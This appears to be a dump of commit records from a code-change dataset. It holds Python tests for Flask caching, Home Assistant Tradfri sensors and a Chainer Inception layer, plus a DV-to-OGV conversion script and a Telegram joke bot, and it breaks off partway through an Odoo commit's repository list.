commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values |
|---|---|---|---|---|---|---|---|---|
d5250790d3509dfe4cbd1f507c83a92bef9614fe | Test cache instance. | soasme/Flask-CacheOBJ,liwushuo/Flask-CacheOBJ | tests.py | tests.py | # -*- coding: utf-8 -*-
import pytest
from flask import Flask
from flask.ext.cacheobj import FlaskCacheOBJ, Msgpackable
app = Flask(__name__)
cache = FlaskCacheOBJ()
cache.init_app(app)
@pytest.fixture
def app(request):
app = Flask(__name__)
ctx = app.app_context()
ctx.push()
request.addfinalizer(ctx.pop)
return app
@pytest.fixture
def cache(app, request):
cache = FlaskCacheOBJ()
app.config['CACHE_HOST'] = 'localhost'
cache.init_app(app)
request.addfinalizer(cache.mc._flushall)
return cache
def test_mc_initialized(cache):
assert cache.mc
class Obj(Msgpackable):
def __init__(self, id):
self.id = id
def test_cache_obj(cache):
@cache.obj({'key': 'test_cache_obj:{id}', 'expire': 1})
def get(id):
return Obj(id)
assert not cache.mc.get('test_cache_obj:1')
assert get(1)
assert cache.mc.get('test_cache_obj:1')
assert get(1)
def test_cache_list(cache):
@cache.list({'key': 'test_cache_list:{id}', 'expire': 1})
def get(id):
return range(id)
assert not cache.mc.smembers('test_cache_list:1')
assert get(1)
assert cache.mc.exists('test_cache_list:1')
assert get(1)
def test_cache_hash(cache):
@cache.hash({'key': '{id}', 'hash_key': 'item', 'expire': 1})
def get(id):
return Obj(1)
assert not cache.mc.hget('item', '1')
assert get(1)
assert cache.mc.hget('item', '1')
assert get(1)
def test_cache_counter(cache):
@cache.counter({'key': 'test_cache_counter:{id}', 'expire': 1})
def get(id):
return int(id)
assert not cache.mc.get('test_cache_counter:1')
assert get(1)
assert int(cache.mc.get('test_cache_counter:1'))
assert get(1)
| mit | Python | |
e87fb6fc09e70dbcd9c65d183c0addb1b290ffcf | Add test cases for Tradfri sensor platform (#64165) | nkgilley/home-assistant,GenericStudent/home-assistant,mezz64/home-assistant,rohitranjan1991/home-assistant,w1ll1am23/home-assistant,toddeye/home-assistant,rohitranjan1991/home-assistant,rohitranjan1991/home-assistant,nkgilley/home-assistant,GenericStudent/home-assistant,toddeye/home-assistant,mezz64/home-assistant,w1ll1am23/home-assistant | tests/components/tradfri/test_sensor.py | tests/components/tradfri/test_sensor.py | """Tradfri sensor platform tests."""
from unittest.mock import MagicMock, Mock
from .common import setup_integration
def mock_sensor(state_name: str, state_value: str, device_number=0):
"""Mock a tradfri sensor."""
dev_info_mock = MagicMock()
dev_info_mock.manufacturer = "manufacturer"
dev_info_mock.model_number = "model"
dev_info_mock.firmware_version = "1.2.3"
# Set state value, eg battery_level = 50
setattr(dev_info_mock, state_name, state_value)
_mock_sensor = Mock(
id=f"mock-sensor-id-{device_number}",
reachable=True,
observe=Mock(),
device_info=dev_info_mock,
has_light_control=False,
has_socket_control=False,
has_blind_control=False,
has_signal_repeater_control=False,
has_air_purifier_control=False,
)
_mock_sensor.name = f"tradfri_sensor_{device_number}"
return _mock_sensor
async def test_battery_sensor(hass, mock_gateway, mock_api_factory):
"""Test that a battery sensor is correctly added."""
mock_gateway.mock_devices.append(
mock_sensor(state_name="battery_level", state_value=60)
)
await setup_integration(hass)
sensor_1 = hass.states.get("sensor.tradfri_sensor_0")
assert sensor_1 is not None
assert sensor_1.state == "60"
assert sensor_1.attributes["unit_of_measurement"] == "%"
assert sensor_1.attributes["device_class"] == "battery"
async def test_sensor_observed(hass, mock_gateway, mock_api_factory):
"""Test that sensors are correctly observed."""
sensor = mock_sensor(state_name="battery_level", state_value=60)
mock_gateway.mock_devices.append(sensor)
await setup_integration(hass)
assert len(sensor.observe.mock_calls) > 0
async def test_sensor_available(hass, mock_gateway, mock_api_factory):
"""Test sensor available property."""
sensor = mock_sensor(state_name="battery_level", state_value=60, device_number=1)
sensor.reachable = True
sensor2 = mock_sensor(state_name="battery_level", state_value=60, device_number=2)
sensor2.reachable = False
mock_gateway.mock_devices.append(sensor)
mock_gateway.mock_devices.append(sensor2)
await setup_integration(hass)
assert hass.states.get("sensor.tradfri_sensor_1").state == "60"
assert hass.states.get("sensor.tradfri_sensor_2").state == "unavailable"
| apache-2.0 | Python | |
5938881e939ce5088974489a943bd7d86925732f | Add unittest for inception | jnishi/chainer,ytoyama/yans_chainer_hackathon,masia02/chainer,minhpqn/chainer,hvy/chainer,t-abe/chainer,muupan/chainer,yanweifu/chainer,anaruse/chainer,ktnyt/chainer,okuta/chainer,hvy/chainer,muupan/chainer,sinhrks/chainer,wkentaro/chainer,hvy/chainer,okuta/chainer,sinhrks/chainer,cupy/cupy,jnishi/chainer,niboshi/chainer,chainer/chainer,cemoody/chainer,chainer/chainer,pfnet/chainer,kiyukuta/chainer,truongdq/chainer,kuwa32/chainer,ktnyt/chainer,niboshi/chainer,sou81821/chainer,hvy/chainer,tkerola/chainer,keisuke-umezawa/chainer,delta2323/chainer,ikasumi/chainer,benob/chainer,benob/chainer,rezoo/chainer,kikusu/chainer,jnishi/chainer,keisuke-umezawa/chainer,cupy/cupy,niboshi/chainer,ktnyt/chainer,chainer/chainer,ktnyt/chainer,keisuke-umezawa/chainer,woodshop/complex-chainer,chainer/chainer,okuta/chainer,hidenori-t/chainer,wkentaro/chainer,ronekko/chainer,wkentaro/chainer,tigerneil/chainer,Kaisuke5/chainer,tscohen/chainer,t-abe/chainer,wavelets/chainer,kashif/chainer,kikusu/chainer,aonotas/chainer,niboshi/chainer,ysekky/chainer,cupy/cupy,AlpacaDB/chainer,keisuke-umezawa/chainer,woodshop/chainer,laysakura/chainer,1986ks/chainer,okuta/chainer,AlpacaDB/chainer,jnishi/chainer,wkentaro/chainer,cupy/cupy,truongdq/chainer,umitanuki/chainer | tests/functions_tests/test_inception.py | tests/functions_tests/test_inception.py | import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestInception(unittest.TestCase):
in_channels = 3
out1, proj3, out3, proj5, out5, proj_pool = 3, 2, 3, 2, 3, 3
def setUp(self):
self.x = numpy.random.uniform(-1, 1, (10, self.in_channels, 5, 5)).astype(numpy.float32)
out = self.out1 + self.out3 + self.out5 + self.proj_pool
self.gy = numpy.random.uniform(-1, 1, (10, out, 5, 5)).astype(numpy.float32)
self.f = functions.Inception(self.in_channels, self.out1, self.proj3, self.out3, self.proj5, self.out5, self.proj_pool)
def check_forward(self, x_data):
x = chainer.Variable(x_data)
y = self.f(x)
@condition.retry(3)
def test_forward_cpu(self):
self.check_forward(self.x)
@condition.retry(3)
@attr.gpu
def test_forward_gpu(self):
self.f.to_gpu()
self.check_forward(cuda.to_gpu(self.x))
def check_backward(self, x_data, y_grad):
x = chainer.Variable(x_data)
y = self.f(x)
y.grad = y_grad
y.backward()
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.gy)
@condition.retry(3)
@attr.gpu
def test_backward_gpu(self):
self.f.to_gpu()
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
testing.run_module(__name__, __file__)
| mit | Python | |
92a911a53158a89f0bd7f7e989de47f1854268ff | make ogvs for just one episode | xfxf/veyepar,CarlFK/veyepar,CarlFK/veyepar,CarlFK/veyepar,yoe/veyepar,xfxf/veyepar,yoe/veyepar,yoe/veyepar,xfxf/veyepar,CarlFK/veyepar,EricSchles/veyepar,yoe/veyepar,CarlFK/veyepar,xfxf/veyepar,yoe/veyepar,EricSchles/veyepar,EricSchles/veyepar,xfxf/veyepar,EricSchles/veyepar,EricSchles/veyepar | dj/scripts/dv2ogv.py | dj/scripts/dv2ogv.py | #!/usr/bin/python
# makes .ogv for all dv in a show
import os
import subprocess
from process import process
from main.models import Client, Show, Location, Episode, Raw_File, Cut_List
class mkpreview(process):
def one_dv(self,loc_dir,dv):
print dv.filename,
src = os.path.join(loc_dir,dv.filename)
dst = os.path.join(loc_dir,dv.basename()+'.ogv')
print os.path.exists(dst)
if (not os.path.exists(dst)) or self.options.whack:
cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --keyint 256".split()
# cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --height 240 --framerate 2 --keyint 256 --channels 1".split()
# cmd="ffmpeg2theora --videoquality 10 --videobitrate 16778 --optimize --audioquality 10 --audiobitrate 500 --keyint 1".split()
cmd+=[ src, '-o', dst, ]
# print ' '.join(cmd)
if self.options.test:
print "testing"
else:
p=subprocess.Popen(cmd).wait()
return
def process_ep(self, ep):
dir=os.path.join(self.show_dir,'dv',ep.location.slug)
dvs = Raw_File.objects.filter(cut_list__episode=ep)
for dv in dvs:
self.one_dv(dir,dv)
return True
"""
def one_loc(self,location,dir):
for dv in Raw_File.objects.filter(location=location):
self.one_dv(dir,dv)
def one_show(self, show):
self.set_dirs(show)
for loc in Location.objects.filter(show=show):
dir=os.path.join(self.show_dir,'dv',loc.slug)
if self.options.verbose: print show,loc,dir
self.one_loc(loc, dir)
def work(self):
# find and process show
if self.options.client and self.options.show:
client = Client.objects.get(slug=self.options.client)
show = Show.objects.get(client=client, slug=self.options.show)
self.one_show(show)
return
def add_more_options(self, parser):
parser.add_option('-o', '--orphans', action='store_true',
help='process orpahans (too?)' )
"""
if __name__=='__main__':
p=mkpreview()
p.main()
| #!/usr/bin/python
# makes .ogv for all dv in a show
import os
import subprocess
from process import process
from main.models import Client, Show, Location, Episode, Raw_File, Cut_List
class mkpreview(process):
def one_dv(self,loc_dir,dv):
src = os.path.join(loc_dir,dv.filename)
dst = os.path.join(loc_dir,dv.basename()+'.ogv')
if not os.path.exists(dst):
cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --keyint 256".split()
# cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --height 240 --framerate 2 --keyint 256 --channels 1".split()
# cmd="ffmpeg2theora --videoquality 10 --videobitrate 16778 --optimize --audioquality 10 --audiobitrate 500 --keyint 1".split()
cmd+=[ src, '-o', dst, ]
print ' '.join(cmd)
p=subprocess.Popen(cmd).wait()
return
"""
def process_ep(self, ep):
dir=os.path.join(self.show_dir,'dv',ep.location.slug)
dvs = Raw_File.objects.filter(cut_list__episode=ep)
for dv in dvs:
self.one_dv(dir,dv)
return True
"""
def one_loc(self,location,dir):
for dv in Raw_File.objects.filter(location=location):
self.one_dv(dir,dv)
def one_show(self, show):
self.set_dirs(show)
for loc in Location.objects.filter(show=show):
dir=os.path.join(self.show_dir,'dv',loc.slug)
if self.options.verbose: print show,loc,dir
self.one_loc(loc, dir)
def work(self):
"""
find and process show
"""
if self.options.client and self.options.show:
client = Client.objects.get(slug=self.options.client)
show = Show.objects.get(client=client, slug=self.options.show)
self.one_show(show)
return
def add_more_options(self, parser):
parser.add_option('-o', '--orphans', action='store_true',
help='csv file' )
if __name__=='__main__':
p=mkpreview()
p.main()
| mit | Python |
36756dbd6b287f8dc6d5629027a8fe75d0f4bb09 | Add Chuck Norris bot to the team | farhaanbukhsh/Telegram-Bots | NorrisIsSoFunny_bot.py | NorrisIsSoFunny_bot.py | import telegram
LAST_UPDATE_ID = None
def main():
''' This is the main function that has to be called '''
global LAST_UPDATE_ID
# Telegram Bot Authorization Token
bot = telegram.Bot('put your token here')
# This will be our global variable to keep the latest update_id when requesting
# for updates. It starts with the latest update_id if available.
try:
LAST_UPDATE_ID = bot.getUpdates()[-1].update_id
except IndexError:
LAST_UPDATE_ID = None
while True:
fetch_url(bot)
def list_compare(first_list, second_list):
''' Function to compare two list and return the index of first matched index'''
for word in first_list:
if word in second_list:
return second_list.index(word)
return -1
def fetch_url(bot):
global LAST_UPDATE_ID
# Following is a dictionary of commands that the bot can use
commands = {'/help':"Jokes are what I am made for, my speciality is Chuck Norris", '/start':'I am here to give you more jokes about Chuck Norris, because he is the best'}
magic_words = ['more','More','/more','/More']
for update in bot.getUpdates(offset=LAST_UPDATE_ID, timeout=10):
chat_id = update.message.chat_id
message = update.message.text.encode('utf-8')
message_list = message.split()
if(message in commands):
bot.sendMessage(chat_id=chat_id, text=commands[message])
LAST_UPDATE_ID = update.update_id + 1
# Name of my bot is NorrisIsFunny_bot replace your bot name with this
if ( list_compare(magic_words, message_list)!= -1 or message == '/more@NorrisIsSoFunny_bot'):
import requests
import json
url = 'http://api.icndb.com/jokes/random'
myResponse = requests.get(url)
if (myResponse.ok):
jData = json.loads(myResponse.content)
jValue = jData.get('value')
jJoke = str(jValue.get('joke'))
bot.sendMessage(chat_id=chat_id,text=jJoke)
LAST_UPDATE_ID = update.update_id + 1
if __name__ == '__main__':
main()
| mit | Python | |
924ef1395214c2f71b96c21f41e240c88f0570a1 | Add project_security.xml file entry in update_xml section | gavin-feng/odoo,hip-odoo/odoo,SerpentCS/odoo,OpusVL/odoo,ecosoft-odoo/odoo,abstract-open-solutions/OCB,ojengwa/odoo,cloud9UG/odoo,spadae22/odoo,chiragjogi/odoo,rdeheele/odoo,fevxie/odoo,gavin-feng/odoo,jolevq/odoopub,alhashash/odoo,ramitalat/odoo,numerigraphe/odoo,apanju/GMIO_Odoo,blaggacao/OpenUpgrade,shivam1111/odoo,joshuajan/odoo,KontorConsulting/odoo,stephen144/odoo,Danisan/odoo-1,OpenUpgrade/OpenUpgrade,codekaki/odoo,fevxie/odoo,ovnicraft/odoo,ccomb/OpenUpgrade,cdrooom/odoo,fgesora/odoo,GauravSahu/odoo,Ichag/odoo,savoirfairelinux/OpenUpgrade,poljeff/odoo,patmcb/odoo,collex100/odoo,alexteodor/odoo,ccomb/OpenUpgrade,goliveirab/odoo,tinkerthaler/odoo,hbrunn/OpenUpgrade,SerpentCS/odoo,gsmartway/odoo,deKupini/erp,juanalfonsopr/odoo,Maspear/odoo,BT-ojossen/odoo,nuncjo/odoo,gdgellatly/OCB1,OSSESAC/odoopubarquiluz,prospwro/odoo,bkirui/odoo,syci/OCB,doomsterinc/odoo,hip-odoo/odoo,datenbetrieb/odoo,syci/OCB,minhtuancn/odoo,cdrooom/odoo,RafaelTorrealba/odoo,hbrunn/OpenUpgrade,GauravSahu/odoo,glovebx/odoo,tvibliani/odoo,optima-ict/odoo,pplatek/odoo,hanicker/odoo,JCA-Developpement/Odoo,slevenhagen/odoo,fuhongliang/odoo,patmcb/odoo,slevenhagen/odoo-npg,ecosoft-odoo/odoo,realsaiko/odoo,Nowheresly/odoo,Maspear/odoo,rubencabrera/odoo,slevenhagen/odoo-npg,jpshort/odoo,nitinitprof/odoo,jusdng/odoo,odooindia/odoo,VitalPet/odoo,tinkerthaler/odoo,Ernesto99/odoo,SerpentCS/odoo,podemos-info/odoo,shingonoide/odoo,dezynetechnologies/odoo,diagramsoftware/odoo,provaleks/o8,acshan/odoo,OpenPymeMx/OCB,stonegithubs/odoo,dezynetechnologies/odoo,javierTerry/odoo,codekaki/odoo,slevenhagen/odoo,cloud9UG/odoo,CubicERP/odoo,acshan/odoo,acshan/odoo,credativUK/OCB,erkrishna9/odoo,abdellatifkarroum/odoo,stonegithubs/odoo,lombritz/odoo,bplancher/odoo,Eric-Zhong/odoo,prospwro/odoo,alexcuellar/odoo,alqfahad/odoo,nhomar/odoo-mirror,KontorConsulting/odoo,kybriainfotech/iSocioCRM,synconics/odoo,lightcn/odoo,fevxie/odoo,tinkerthaler/odoo,markeTIC/OCB,apanju/GMIO_Odoo,erkrishna9/odoo,hifly/OpenUpgrade,rdeheele/odoo,pedrobaeza/OpenUpgrade,OpenUpgrade/OpenUpgrade,gorjuce/odoo,OpenPymeMx/OCB,Gitlab11/odoo,abdellatifkarroum/odoo,Endika/odoo,Daniel-CA/odoo,frouty/odoo_oph,highco-groupe/odoo,credativUK/OCB,ramadhane/odoo,alexcuellar/odoo,omprakasha/odoo,srimai/odoo,rschnapka/odoo,zchking/odoo,matrixise/odoo,luistorresm/odoo,VielSoft/odoo,ehirt/odoo,Elico-Corp/odoo_OCB,cysnake4713/odoo,JGarcia-Panach/odoo,SerpentCS/odoo,bguillot/OpenUpgrade,Nick-OpusVL/odoo,mkieszek/odoo,srimai/odoo,tinkhaven-organization/odoo,fjbatresv/odoo,gvb/odoo,fevxie/odoo,glovebx/odoo,bguillot/OpenUpgrade,simongoffin/website_version,frouty/odoo_oph,waytai/odoo,credativUK/OCB,elmerdpadilla/iv,guewen/OpenUpgrade,Antiun/odoo,takis/odoo,QianBIG/odoo,ThinkOpen-Solutions/odoo,markeTIC/OCB,apanju/GMIO_Odoo,takis/odoo,ccomb/OpenUpgrade,odoo-turkiye/odoo,incaser/odoo-odoo,mvaled/OpenUpgrade,cysnake4713/odoo,oasiswork/odoo,florentx/OpenUpgrade,tvibliani/odoo,frouty/odoo_oph,arthru/OpenUpgrade,lsinfo/odoo,leorochael/odoo,dsfsdgsbngfggb/odoo,bakhtout/odoo-educ,rahuldhote/odoo,alhashash/odoo,grap/OpenUpgrade,dgzurita/odoo,draugiskisprendimai/odoo,CatsAndDogsbvba/odoo,doomsterinc/odoo,sysadminmatmoz/OCB,brijeshkesariya/odoo,OpenPymeMx/OCB,microcom/odoo,aviciimaxwell/odoo,ingadhoc/odoo,alexcuellar/odoo,deKupini/erp,ramitalat/odoo,n0m4dz/odoo,wangjun/odoo,colinnewell/odoo,savoirfairelinux/odoo,oasiswork/odoo,datenbetrieb/odoo,sinbazhou/odoo,tinkhaven-organization/odoo,funkring/fdoo,luistorresm/odoo,glovebx/odoo,mustafat/odoo-1,fdvarela/odoo8,hbrunn/OpenUpgrade,gdgellatly/OCB1,jfpla/odoo,Drooids/odoo,provaleks/o8,tvtsoft/odoo8,slevenhagen/odoo-npg,virgree/odoo,QianBIG/odoo,cysnake4713/odoo,gsmartway/odoo,fuselock/odoo,goliveirab/odoo,windedge/odoo,rowemoore/odoo,KontorConsulting/odoo,Eric-Zhong/odoo,VielSoft/odoo,n0m4dz/odoo,jolevq/odoopub,ingadhoc/odoo,apocalypsebg/odoo,diagramsoftware/odoo,kirca/OpenUpgrade,tangyiyong/odoo,shaufi/odoo,shingonoide/odoo,ovnicraft/odoo,ingadhoc/odoo,dsfsdgsbngfggb/odoo,RafaelTorrealba/odoo,JonathanStein/odoo,demon-ru/iml-crm,nexiles/odoo,markeTIC/OCB,VielSoft/odoo,gvb/odoo,Kilhog/odoo,andreparames/odoo,nagyistoce/odoo-dev-odoo,Eric-Zhong/odoo,minhtuancn/odoo,osvalr/odoo,shaufi/odoo,mlaitinen/odoo,ThinkOpen-Solutions/odoo,PongPi/isl-odoo,oliverhr/odoo,elmerdpadilla/iv,agrista/odoo-saas,bwrsandman/OpenUpgrade,thanhacun/odoo,factorlibre/OCB,RafaelTorrealba/odoo,Grirrane/odoo,ovnicraft/odoo,nuuuboo/odoo,Grirrane/odoo,arthru/OpenUpgrade,rahuldhote/odoo,dkubiak789/odoo,mustafat/odoo-1,jesramirez/odoo,slevenhagen/odoo,Grirrane/odoo,nhomar/odoo,bkirui/odoo,klunwebale/odoo,dgzurita/odoo,Maspear/odoo,csrocha/OpenUpgrade,csrocha/OpenUpgrade,savoirfairelinux/OpenUpgrade,provaleks/o8,alexteodor/odoo,xujb/odoo,lgscofield/odoo,rahuldhote/odoo,oasiswork/odoo,lightcn/odoo,grap/OCB,idncom/odoo,jesramirez/odoo,numerigraphe/odoo,csrocha/OpenUpgrade,addition-it-solutions/project-all,ThinkOpen-Solutions/odoo,CatsAndDogsbvba/odoo,sebalix/OpenUpgrade,bealdav/OpenUpgrade,hbrunn/OpenUpgrade,patmcb/odoo,dsfsdgsbngfggb/odoo,apocalypsebg/odoo,bealdav/OpenUpgrade,jiachenning/odoo,zchking/odoo,jpshort/odoo,minhtuancn/odoo,makinacorpus/odoo,csrocha/OpenUpgrade,dgzurita/odoo,kifcaliph/odoo,tarzan0820/odoo,BT-astauder/odoo,bobisme/odoo,realsaiko/odoo,credativUK/OCB,alqfahad/odoo,camptocamp/ngo-addons-backport,sinbazhou/odoo,apanju/odoo,zchking/odoo,NeovaHealth/odoo,steedos/odoo,stephen144/odoo,kifcaliph/odoo,chiragjogi/odoo,virgree/odoo,rdeheele/odoo,ehirt/odoo,steedos/odoo,brijeshkesariya/odoo,jpshort/odoo,waytai/odoo,KontorConsulting/odoo,vnsofthe/odoo,Kilhog/odoo,Ernesto99/odoo,dalegregory/odoo,apocalypsebg/odoo,hassoon3/odoo,pedrobaeza/OpenUpgrade,tinkhaven-organization/odoo,stephen144/odoo,camptocamp/ngo-addons-backport,Bachaco-ve/odoo,colinnewell/odoo,apanju/GMIO_Odoo,Eric-Zhong/odoo,juanalfonsopr/odoo,rgeleta/odoo,havt/odoo,podemos-info/odoo,bkirui/odoo,sv-dev1/odoo,jfpla/odoo,sinbazhou/odoo,ApuliaSoftware/odoo,lightcn/odoo,Nowheresly/odoo,highco-groupe/odoo,alqfahad/odoo,prospwro/odoo,cpyou/odoo,christophlsa/odoo,SAM-IT-SA/odoo,guewen/OpenUpgrade,gorjuce/odoo,ccomb/OpenUpgrade,leorochael/odoo,sebalix/OpenUpgrade,odoo-turkiye/odoo,Nowheresly/odoo,Maspear/odoo,collex100/odoo,ojengwa/odoo,Endika/OpenUpgrade,RafaelTorrealba/odoo,vnsofthe/odoo,steedos/odoo,frouty/odoo_oph,Daniel-CA/odoo,vrenaville/ngo-addons-backport,gdgellatly/OCB1,janocat/odoo,joshuajan/odoo,massot/odoo,florentx/OpenUpgrade,ramadhane/odoo,Maspear/odoo,funkring/fdoo,FlorianLudwig/odoo,Adel-Magebinary/odoo,ramadhane/odoo,guerrerocarlos/odoo,juanalfonsopr/odoo,ramadhane/odoo,srsman/odoo,grap/OCB,oihane/odoo,dllsf/odootest,Nowheresly/odoo,fjbatresv/odoo,odootr/odoo,hopeall/odoo,minhtuancn/odoo,Bachaco-ve/odoo,rgeleta/odoo,JGarcia-Panach/odoo,gdgellatly/OCB1,rowemoore/odoo,JGarcia-Panach/odoo,janocat/odoo,Bachaco-ve/odoo,aviciimaxwell/odoo,ChanduERP/odoo,OpenUpgrade-dev/OpenUpgrade,luiseduardohdbackup/odoo,KontorConsulting/odoo,colinnewell/odoo,zchking/odoo,Drooids/odoo,Bachaco-ve/odoo,hoatle/odoo,thanhacun/odoo,fuhongliang/odoo,Ernesto99/odoo,janocat/odoo,FlorianLudwig/odoo,PongPi/isl-odoo,nexiles/odoo,ShineFan/odoo,hmen89/odoo,gavin-feng/odoo,grap/OCB,VitalPet/odoo,xzYue/odoo,credativUK/OCB,gorjuce/odoo,0k/OpenUpgrade,salaria/odoo,shaufi/odoo,dkubiak789/odoo,CubicERP/odoo,AuyaJackie/odoo,damdam-s/OpenUpgrade,JCA-Developpement/Odoo,joariasl/odoo,NeovaHealth/odoo,jeasoft/odoo,gvb/odoo,thanhacun/odoo,avoinsystems/odoo,leoliujie/odoo,0k/odoo,BT-fgarbely/odoo,CopeX/odoo,NL66278/OCB,BT-rmartin/odoo,luiseduardohdbackup/odoo,shaufi10/odoo,NeovaHealth/odoo,joariasl/odoo,arthru/OpenUpgrade,ihsanudin/odoo,hubsaysnuaa/odoo,OpenUpgrade-dev/OpenUpgrade,markeTIC/OCB,oihane/odoo,storm-computers/odoo,MarcosCommunity/odoo,gdgellatly/OCB1,xzYue/odoo,nuncjo/odoo,colinnewell/odoo,jolevq/odoopub,chiragjogi/odoo,leoliujie/odoo,synconics/odoo,blaggacao/OpenUpgrade,storm-computers/odoo,x111ong/odoo,BT-fgarbely/odoo,simongoffin/website_version,fgesora/odoo,tarzan0820/odoo,provaleks/o8,Codefans-fan/odoo,bwrsandman/OpenUpgrade,bobisme/odoo,idncom/odoo,abstract-open-solutions/OCB,dsfsdgsbngfggb/odoo,nexiles/odoo,draugiskisprendimai/odoo,kirca/OpenUpgrade,ramitalat/odoo,NeovaHealth/odoo,ingadhoc/odoo,cedk/odoo,acshan/odoo,rgeleta/odoo,ClearCorp-dev/odoo,CubicERP/odoo,guewen/OpenUpgrade,rubencabrera/odoo,sadleader/odoo,nexiles/odoo,bplancher/odoo,laslabs/odoo,hubsaysnuaa/odoo,inspyration/odoo,Antiun/odoo,janocat/odoo,tinkerthaler/odoo,brijeshkesariya/odoo,charbeljc/OCB,markeTIC/OCB,dfang/odoo,ramadhane/odoo,AuyaJackie/odoo,Drooids/odoo,deKupini/erp,andreparames/odoo,nhomar/odoo-mirror,kirca/OpenUpgrade,Kilhog/odoo,MarcosCommunity/odoo,takis/odoo,syci/OCB,shivam1111/odoo,odoousers2014/odoo,charbeljc/OCB,BT-rmartin/odoo,tangyiyong/odoo,cedk/odoo,abenzbiria/clients_odoo,n0m4dz/odoo,florentx/OpenUpgrade,vrenaville/ngo-addons-backport,JGarcia-Panach/odoo,stonegithubs/odoo,ujjwalwahi/odoo,sve-odoo/odoo,BT-ojossen/odoo,rschnapka/odoo,fossoult/odoo,laslabs/odoo,gsmartway/odoo,brijeshkesariya/odoo,lightcn/odoo,Eric-Zhong/odoo,shaufi/odoo,CubicERP/odoo,cdrooom/odoo,Endika/odoo,massot/odoo,kittiu/odoo,hubsaysnuaa/odoo,savoirfairelinux/OpenUpgrade,draugiskisprendimai/odoo,dariemp/odoo,dfang/odoo,waytai/odoo,jiachenning/odoo,jaxkodex/odoo,ehirt/odoo,markeTIC/OCB,numerigraphe/odoo,addition-it-solutions/project-all,AuyaJackie/odoo,inspyration/odoo,jusdng/odoo,glovebx/odoo,waytai/odoo,prospwro/odoo,sadleader/odoo,cedk/odoo,ehirt/odoo,tvtsoft/odoo8,factorlibre/OCB,oihane/odoo,draugiskisprendimai/odoo,omprakasha/odoo,rdeheele/odoo,windedge/odoo,rahuldhote/odoo,thanhacun/odoo,SerpentCS/odoo,joariasl/odoo,jaxkodex/odoo,mmbtba/odoo,oasiswork/odoo,srsman/odoo,ApuliaSoftware/odoo,AuyaJackie/odoo,frouty/odoogoeen,zchking/odoo,Danisan/odoo-1,jpshort/odoo,erkrishna9/odoo,x111ong/odoo,Drooids/odoo,xujb/odoo,hanicker/odoo,nuuuboo/odoo,funkring/fdoo,leorochael/odoo,glovebx/odoo,oliverhr/odoo,fgesora/odoo,dkubiak789/odoo,Danisan/odoo-1,BT-rmartin/odoo,microcom/odoo,blaggacao/OpenUpgrade,CatsAndDogsbvba/odoo,salaria/odoo,odoo-turkiye/odoo,ramitalat/odoo,fuselock/odoo,vrenaville/ngo-addons-backport,OpusVL/odoo,apanju/odoo,abdellatifkarroum/odoo,nuncjo/odoo,fuselock/odoo,feroda/odoo,Drooids/odoo,vrenaville/ngo-addons-backport,leorochael/odoo,vnsofthe/odoo,bplancher/odoo,cedk/odoo,slevenhagen/odoo-npg,dezynetechnologies/odoo,Bachaco-ve/odoo,sve-odoo/odoo,kirca/OpenUpgrade,Elico-Corp/odoo_OCB,havt/odoo,demon-ru/iml-crm,lombritz/odoo,ApuliaSoftware/odoo,Endika/OpenUpgrade,BT-fgarbely/odoo,dfang/odoo,Endika/odoo,joariasl/odoo,havt/odoo,FlorianLudwig/odoo,diagramsoftware/odoo,acshan/odoo,FlorianLudwig/odoo,windedge/odoo,Danisan/odoo-1,Gitlab11/odoo,avoinsystems/odoo,takis/odoo,credativUK/OCB,gorjuce/odoo,sysadminmatmoz/OCB,virgree/odoo,goliveirab/odoo,fgesora/odoo,jesramirez/odoo,ubic135/odoo-design,funkring/fdoo,stonegithubs/odoo,avoinsystems/odoo,papouso/odoo,tvtsoft/odoo8,grap/OCB,apanju/odoo,takis/odoo,luistorresm/odoo,grap/OCB,lgscofield/odoo,shivam1111/odoo,optima-ict/odoo,Elico-Corp/odoo_OCB,fdvarela/odoo8,jeasoft/odoo,charbeljc/OCB,naousse/odoo,tinkerthaler/odoo,ingadhoc/odoo,savoirfairelinux/OpenUpgrade,Endika/odoo,christophlsa/odoo,fossoult/odoo,fdvarela/odoo8,hopeall/odoo,vrenaville/ngo-addons-backport,laslabs/odoo,apocalypsebg/odoo,JCA-Developpement/Odoo,tangyiyong/odoo,havt/odoo,jpshort/odoo,blaggacao/OpenUpgrade,nagyistoce/odoo-dev-odoo,zchking/odoo,srimai/odoo,QianBIG/odoo,fossoult/odoo,odoo-turkiye/odoo,gsmartway/odoo,fjbatresv/odoo,lombritz/odoo,gorjuce/odoo,salaria/odoo,jaxkodex/odoo,hoatle/odoo,chiragjogi/odoo,luiseduardohdbackup/odoo,spadae22/odoo,massot/odoo,OpenUpgrade/OpenUpgrade,Kilhog/odoo,oasiswork/odoo,collex100/odoo,Maspear/odoo,OpenUpgrade-dev/OpenUpgrade,TRESCLOUD/odoopub,pedrobaeza/OpenUpgrade,pedrobaeza/OpenUpgrade,spadae22/odoo,stonegithubs/odoo,shaufi10/odoo,SAM-IT-SA/odoo,frouty/odoo_oph,synconics/odoo,luistorresm/odoo,javierTerry/odoo,bguillot/OpenUpgrade,CopeX/odoo,ThinkOpen-Solutions/odoo,CopeX/odoo,NL66278/OCB,fevxie/odoo,jaxkodex/odoo,ujjwalwahi/odoo,mustafat/odoo-1,camptocamp/ngo-addons-backport,ChanduERP/odoo,mustafat/odoo-1,luistorresm/odoo,hmen89/odoo,Ichag/odoo,bguillot/OpenUpgrade,ujjwalwahi/odoo,BT-ojossen/odoo,jusdng/odoo,thanhacun/odoo,sergio-incaser/odoo,windedge/odoo,brijeshkesariya/odoo,codekaki/odoo,juanalfonsopr/odoo,minhtuancn/odoo,syci/OCB,MarcosCommunity/odoo,fuselock/odoo,inspyration/odoo,lombritz/odoo,microcom/odoo,Noviat/o